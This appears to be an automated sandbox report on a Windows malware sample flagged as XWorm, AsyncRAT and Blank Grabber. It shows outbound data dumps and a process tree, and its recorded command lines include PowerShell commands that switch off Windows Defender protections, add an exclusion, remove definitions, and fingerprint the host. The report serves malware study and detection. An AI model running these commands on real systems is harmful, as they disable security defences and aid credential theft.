2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 8a 8a 2e a2 8b 76 b5 1d d1 24 87 76 25 b0 d0 70 6c 3e 3c 5d 6c a6 0b 63 e6 31 9e 35 9b c7 e9 a2 ca 7d 5f cf 4e 9b 0c 9d a6 0b 7a 15 90 ca 5b 81 7a e2 0f 39 b5 cc f6 0c 34 7d ca de 6f 56 ec ff 5a 5e 3a 77 38 c5 f9 c8 b6 3c 10 ae e3 a2 35 ea d0 bd fe 40 09 13 c9 ad 9d c1 1d 2d c0 e1 85 a5 ee c3 27 9b 5a d7 03 4b 46 bb 58 b4 04 31 45 e7 72 38 82 d8 31 f5 1d 32 7b 8e 64 5e 18 c3 f3 77 f8 fe 6e 3a 37 0d 06 b5 21 ff 15 0b 34 29 39 da 3e e8 0c a4 36 ec 7c b8 2f 6a 11 59 f1 40 cc ad 45 7d 77 72 09 c4 84 ad 14 29 1a 96 8a 5e 26 ce 15 42 b7 f2 ee 0a 5f b1 26 6f a6 40 d7 e6 9c ea 2f 94 70 25 f7 e3 61 95 f3 4c 20 f3 bf 13 27 79 5c 50 79 5f 0d 0f ae 26 bb 13 3a 24 64 1d 2f 17 4a 8d 8b 44 d8 e7 bd 9b df cb 3a ad 09 b1 b6 38 ac 1e e1 01 d3 28 a1 ae 88 0d 67 c7 76 83 d0 Data Ascii: .v$v%pl><]lc15}_Nz[z94}oVZ^:w8<5@-'ZKFX1Er812{d^wn:7!4)9>6\|/jY@E}wr)^&B_&o@/p%aL 'y\Py_&:$d/JD:8(gv
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 88 b4 7a c1 fc f5 73 ef ef 3b e3 2d 31 1b 52 f7 3e 5b 19 71 9c a1 d3 08 99 8c 4f c0 11 64 e2 23 6c 32 3f 77 9b 7c 09 b5 9b 01 a8 7d fd 5e f9 ec 7e 41 00 b3 30 b8 a3 da 4d ba 7d d7 15 8f 38 06 cb 9b 17 d6 4f 60 d2 a6 4b 25 70 98 e3 9f ab a9 ab c7 a6 4b 91 3e 6f 1b 81 54 12 cf b9 e1 30 f7 c8 f9 e3 35 6f 9c 99 4b 4b d6 ce cd cc 41 d0 d3 41 a5 2e eb 74 7b b0 68 ff 7c b4 a6 70 ca 13 07 08 de 3a bf 17 05 3f 37 fe 3d 52 a6 95 6d 4c 70 77 8d 7e 0a a7 fe 8b af 74 20 ea 6b ee a1 1f 26 92 2f 6c 6f 65 f5 2b 06 07 fd 66 ed 98 fc ef 56 2a a3 9d c7 3a 49 c1 1c ea 51 81 5b 67 ce f2 11 7a 0f 0c 49 db d3 bd 90 45 b1 6e 7b 06 07 89 32 f8 b8 4d 44 55 1d 08 66 f2 1e 6d b4 86 5b 46 11 44 99 bb 67 a7 e7 d0 4d f3 10 b2 47 b0 e7 a5 84 40 b8 51 3a de 36 1b 7e 88 14 d1 df 34 b2 ae Data Ascii: zs;-1R>[qOd#l2?w\|}^~A0M}8O`K%pK>oT05oKKAA.t{h\|p:?7=RmLpw~t k&/loe+fV*:IQ[gzIEn{2MDUfm[FDgMG@Q:6~4
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 94 f6 6e e4 37 37 11 a4 95 f6 65 2e b6 91 7a a5 08 1a 03 50 36 0c f0 76 f0 75 91 7e cd 29 58 6c 44 06 fd fe 5e dc da 6f 88 e1 58 7a 40 30 39 1a 70 e0 8c e2 01 f4 c5 2a 3e c3 cf 69 b8 c9 34 d4 a8 2e ee 30 85 e0 6b 74 aa b4 49 44 7a fc 7d ae ac cb c9 a7 fa ee ba c9 46 e0 5a 94 f5 45 72 22 5b ad be b1 75 33 12 29 ff 78 9b 5e 5d 02 c6 2b 5f 66 b1 7c 08 b5 95 a7 cc c8 ae 54 f5 59 01 3c a9 d9 fa 69 88 53 28 3b c6 fc 23 d3 bc c6 e7 35 d3 9b a0 72 26 68 e6 10 d3 e5 a9 ff 53 fa 91 e5 8b 70 6c b5 4e f2 c9 87 4e 3c 2f 25 99 0e 73 28 3e b6 eb 0e 1e 6b 89 08 ce 2b 32 9d e0 55 13 7f 75 52 a6 03 20 ab a0 a0 c5 6c 0f e7 2c 5e b6 82 67 df 2e dc 60 42 1a 1b 79 9b 68 82 64 ec e2 cb 45 84 d2 81 d8 09 ad bd 00 64 6c 42 31 28 24 f7 e5 bc 3d bc 4c 9e 5f a2 66 9d 85 d3 60 7e fe Data Ascii: n77e.zP6vu~)XlD^oXz@09p*>i4.0ktIDz}FZEr"[u3)x^]+_f\|TY<iS(;#5r&hSplNN</%s(>k+2UuR l,^g.`ByhdEdlB1($=L_f`~
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 3d 9f 74 af 87 3b b5 a1 96 b8 f4 07 bc e4 3f f1 39 b1 1d 19 50 bb ee 9f 29 cd 58 62 fd a7 a5 68 a2 db b2 7a a0 4a 2e 5b e8 de f1 33 f7 3e c8 8e b5 c0 d2 1a fe 89 44 b7 38 f3 d2 01 09 8f cd 34 12 5f bb 38 e2 d1 1d a2 74 68 f9 cc 94 2c 96 8a 30 29 25 58 70 22 df cd c5 ad 71 29 f8 95 52 2a b5 4a d0 57 81 70 c0 f8 a0 8f 83 2b 2a 26 1d bb 06 c4 e1 cc 6f ed 8f 08 3d 04 a5 f4 0d 67 d6 a1 a7 ad f1 29 34 37 1b 3e f6 38 47 9a 63 e1 43 90 ec 27 ba 8b 80 21 6b 53 a3 e5 1b 41 f3 a3 7f ff 20 0e 8e da 1e 0a 34 12 df c5 87 08 3c 35 36 3c 76 7b d8 35 1e b4 da bb 6f 3d 51 57 66 54 f9 ee d0 24 a6 13 e7 b9 b2 b1 9b f1 59 93 63 c6 f6 49 b6 e5 62 9f af 87 30 46 3b a1 1f db c0 83 b6 3a 73 01 0d b8 69 0a 05 20 70 77 4c d6 b5 72 51 4c fa ec 6e 88 7e ec 9e f2 0e a9 90 1d 11 98 e8 Data Ascii: =t;?9P)XbhzJ.[3>D84_8th,0)%Xp"q)RJWp+&o=g)47>8GcC'!kSA 4<56<v{5o=QWfT$YcIb0F;:si pwLrQLn~
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: ad 81 ca 80 9c fe 3a 51 05 6c bd f0 18 94 7c 2c d1 fc 7a 53 22 6a 12 43 d1 cc 85 f3 da ac fb bd 55 17 54 f1 76 eb 3e d8 7a 2d 98 bc 7b ba 84 8c b9 bd 9e 0f b0 66 36 4c ef 7e 0c f2 99 a6 c7 62 8a 8c 70 2b db a0 4b 32 c5 b8 83 7f ac 72 d9 65 da 59 6e 0e 95 95 1a 95 8a 66 cc 4d 2b 2d 2c c1 b8 1f 6a 40 4f c1 b8 da 0e 72 6a 92 d5 3f 94 f8 1f 84 86 46 34 fb 27 51 a2 79 ae 5f de 56 0b 5f a1 0e 64 ae 45 40 05 fb 1e 4d 65 2d e6 92 f1 a0 6e 90 81 ac 30 e8 9f 81 56 cf e3 42 42 80 b3 12 65 df 53 f2 f7 cb 79 69 8f 1e 8d 5f 56 05 06 5f e1 be fd 4c eb b2 c2 ae f4 74 71 7e ab a8 aa e8 e3 e0 2e 21 fc 28 8e e6 46 24 4a 04 51 db 04 cd 5a a0 8f 70 bd 24 54 51 81 50 92 be 02 3c 77 27 b8 98 a2 3e 0e 43 fb 0b 48 46 a2 44 71 fa 55 2a cd 3f 0f 8c 2d 70 02 59 80 b1 5e 69 71 13 79 Data Ascii: :Ql\|,zS"jCUTv>z-{f6L~bp+K2reYnfM+-,j@Orj?F4'Qy_V_dE@Me-n0VBBeSyi_V_Ltq~.!(F$JQZp$TQP<w'>CHFDqU*?-pY^iqy
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 1b 27 24 c1 45 c8 af 54 a6 43 9e f4 d8 47 cd 80 66 c7 d2 0a e8 3e 8a b7 fc f2 5d 43 38 cd 14 ff 4d ad 8b b0 6f db d9 07 47 b7 1e ef ed 5e 10 f0 31 4f 9c 34 b4 62 e1 61 95 99 9d 70 ae a7 53 ce 69 42 62 d0 58 9a f8 92 24 94 62 1c 26 98 9f c7 c7 ec a8 4b 0d a9 f4 f1 ce c9 fa d0 33 c9 6d df a3 a9 8d fc 39 9f 7d 50 61 d5 e9 12 6c 3f 78 cc 2e 7d 86 3b 0e be fc 90 df 8c f2 68 50 4e cb 85 80 fd 63 a5 15 97 62 9d a3 0d 8c 1d a4 57 32 62 99 25 d0 8b 18 b1 b4 13 74 6f 5a c9 11 73 92 8d 9e 63 34 51 30 a5 b4 71 d1 c2 0d 48 84 b7 91 73 98 05 46 43 2e f0 63 78 6d 75 fa 95 f3 f6 f5 81 bf b2 80 1e 69 43 6d 12 c3 c3 e2 6d 5c b6 bf fa 13 c1 68 4e 53 29 1d 46 eb ca a5 67 48 77 d1 df f6 84 fa d2 80 78 c8 d0 1a 38 5c a6 16 1d 43 0b 40 89 09 4b 1b 38 54 54 2d 3a e1 8d 84 c2 c7 Data Ascii: '$ETCGf>]C8MoG^1O4bapSiBbX$b&K3m9}Pal?x.};hPNcbW2b%toZsc4Q0qHsFC.cxmuiCmm\hNS)FgHwx8\C@K8TT-:
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 5b 9b 3c 0f 3c 9a 13 99 ae 32 e0 70 1a d5 43 02 4a 24 3d f2 17 50 69 19 1b d5 1d 65 f6 cc cc b0 46 9a b6 99 ad 9e 13 13 fb ca 91 e9 5c 93 dd 96 a5 00 95 de a1 32 ee 34 24 ea bd a2 0d 79 f2 f9 1b 46 af 98 72 2f 9f b4 af 81 3f bb 8f d3 7d 44 af 66 c7 0d 39 ef 42 3e 4d b4 8b cf cf a6 34 c1 22 23 a7 66 bd cc ee cf 8b 5a 83 19 a8 cc f1 d3 08 5d 09 70 0b dd 66 b2 4d a5 e8 04 c3 44 e1 fd c2 23 ac 80 50 18 71 bc d8 1b b6 80 b1 a1 e9 77 c2 95 4b 18 e1 c3 69 55 09 27 a2 7c 7f f1 e1 ba 78 3a b5 a4 22 76 f8 56 62 f4 1c 9b 2e b6 00 b2 54 d5 c9 98 da 9f 4e 57 52 8b c0 d4 b7 f2 12 14 70 ed e0 4a 2b 34 bd 51 83 fc ab 92 2d 97 ad a4 0f bb 39 b9 ec ff bb 7f e1 1b 1b 33 59 dd 71 6d f6 41 49 0a ed d8 62 ee b8 88 98 e2 cd cd 4f 1d 2f 57 e5 71 f6 cf 11 2b f9 2c 70 e1 10 53 03 Data Ascii: [<<2pCJ$=PieF\24$yFr/?}Df9B>M4"#fZ]pfMD#PqwKiU'\|x:"vVb.TNWRpJ+4Q-93YqmAIbO/Wq+,pS
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: a5 e4 d4 7f ac 29 af ae f3 cb ce fb 64 62 91 9c a7 26 78 b0 a4 ac c1 ce ae b7 3a 52 85 f3 20 3e a2 65 52 c3 48 7c 53 72 2c e9 c8 58 9b 37 f5 7a 6e 1d 73 03 fb a0 42 1e 9b 71 f5 34 ea 4c b3 f7 e7 78 37 4c 8a ac 1b 31 bb 06 64 b8 37 88 22 fb ef 44 7d a6 ae ce 6a c9 af e9 d2 99 2f 89 12 d4 d3 a9 73 1d b0 40 4d 0e ea a2 f0 73 86 3c 2b 0c fd 91 72 0e 98 57 a6 5b e9 a0 d9 55 f1 1b 66 13 dd 1d 15 8e 47 61 71 77 71 6f 85 7f 27 d4 a8 3c 6e fb d1 71 dd fc 65 c0 35 f5 31 98 f6 fc d6 fd 33 82 cd 84 ff 96 1e eb bf 6e 75 79 1d e1 a2 83 bc 9f 38 82 a7 a1 b4 0d 8a a7 bf 65 01 4c 08 20 92 e6 bc a8 e6 05 66 b3 8d 54 c7 20 de ee 55 ce 09 0a ee a7 e6 57 61 ba 0d 31 6e 4b ee b9 80 be c5 5d 9a f7 45 62 c9 4f 70 91 da 08 56 1a 3b 05 2f 14 89 be 42 70 fb b9 4b 3a d6 b7 bf 3d 43 Data Ascii: )db&x:R >eRH\|Sr,X7znsBq4Lx7L1d7"D}j/s@Ms<+rW[UfGaqwqo'<nqe513nuy8eL fT UWa1nK]EbOpV;/BpK:=C
2024-08-05 12:32:36 UTC	16384	OUT	Data Raw: 96 4b ae 64 b5 f5 3e b6 02 00 b9 ac 32 d5 4d 78 12 b4 52 55 7c 23 9e c2 2a 12 1a b2 93 4f 32 f8 43 81 ac fe b2 ca 07 b1 3e 45 32 8c 27 72 32 47 e3 6c f6 cb e8 74 03 5a 4c cb f8 d1 dc df bc 88 d9 3b c7 fe d9 03 ba e4 89 5f 58 71 d2 5c 2d f4 0e 32 a5 a4 a6 47 fd 2e 73 90 e7 09 df 5d 4b 5c 60 49 95 44 f7 d1 25 83 57 9f bc de a6 71 be 3f 8e 04 5b 9d 6d 3a 4b b5 4d dd c3 d5 26 f3 be 60 a7 e7 37 04 a0 3f f3 ef 00 5b 85 c7 f2 c0 a9 76 54 4d 2c 1d 93 d8 d9 f7 9c a4 e0 bc c6 ea 0b 37 2a 0c 91 75 b4 79 e8 c0 07 18 b6 e5 06 5e 11 6b 7b 42 5b 7d e5 61 6e 84 c1 61 30 e8 a4 4f 50 00 e6 ae 94 fb 01 35 d8 7d c1 67 d0 ac 24 21 bb 45 42 b9 76 cd 51 f8 be e8 b4 c3 4a db 64 6a 04 38 e6 d5 9a ff a0 da dd ab 36 d9 b3 00 86 20 92 e1 36 40 dc bc c0 cf 49 e3 73 dd e9 36 81 3f 0e Data Ascii: Kd>2MxRU\|#O2C>E2'r2GltZL;_Xq\-2G.s]K\`ID%Wq?[m:KM&`7?[vTM,7uy^k{B[}ana0OP5}g$!EBvQJdj86 6@Is6?
2024-08-05 12:32:37 UTC	1124	IN	HTTP/1.1 404 Not Found Date: Mon, 05 Aug 2024 12:32:36 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=cc102cbe532611efb691ee972d83bda8; Expires=Sat, 04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1722861158 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7l2Y0cbTqAvp9FnXw%2Fn5Qe08%2BJ3iJfctX0ftX9zN%2F9FZo7aOhzp6m9g5eW61JyzYYhpuEFYJAL9S1R5djAKmMIZnsprSWC94yVsG0NbVHdCVzs%2B9PHVF6rcm4XPJFe9i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: __sdcfduid=cc102cbe532611efb691ee972d83bda82e7f3f39958e45967b3cc47046cb9666bba02bd08ddaaa28342cb9067cb06e2d; Expires=Sat, 04-Aug-2029 12:32:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax

Target ID:	0
Start time:	08:32:01
Start date:	05/08/2024
Path:	C:\Users\user\Desktop\Vjy8d2EoqK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Vjy8d2EoqK.exe"
Imagebase:	0x400000
File size:	8'422'912 bytes
MD5 hash:	A0936899FBF31493BBE5E34DC18A9341
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:32:02
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Local\Temp\Built.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Built.exe"
Imagebase:	0x7ff76d5c0000
File size:	7'170'862 bytes
MD5 hash:	EC729E4911261337E4CA4E9FC77F942B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1694117012.0000021AFD7E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:32:03
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Local\Temp\svchosts.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\svchosts.exe"
Imagebase:	0x290000
File size:	1'164'420 bytes
MD5 hash:	91F72031C3AD088797D77357FA39DB39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:32:03
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Local\Temp\Built.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Built.exe"
Imagebase:	0x7ff76d5c0000
File size:	7'170'862 bytes
MD5 hash:	EC729E4911261337E4CA4E9FC77F942B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2039099236.000001D5E543D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2029505952.000001D5E6183000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2038832287.000001D5E5438000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000003.00000003.2032955728.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:32:03
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Local\Temp\S l r .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\S l r .exe"
Imagebase:	0x400000
File size:	77'824 bytes
MD5 hash:	D69B290766342861CDE3B24BA1ECD0C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\S l r .exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:32:04
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe"
Imagebase:	0x860000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:32:04
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Local\Temp\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\XClient.exe"
Imagebase:	0xd70000
File size:	54'784 bytes
MD5 hash:	BF19D4A22F47EEA6DD1DB1C98A5AAC07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:32:04
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Imagebase:	0x4f0000
File size:	13'312 bytes
MD5 hash:	6557BD5240397F026E675AFB78544A26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 33%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:32:04
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff72aad0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff74ce90000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:32:06
Start date:	05/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
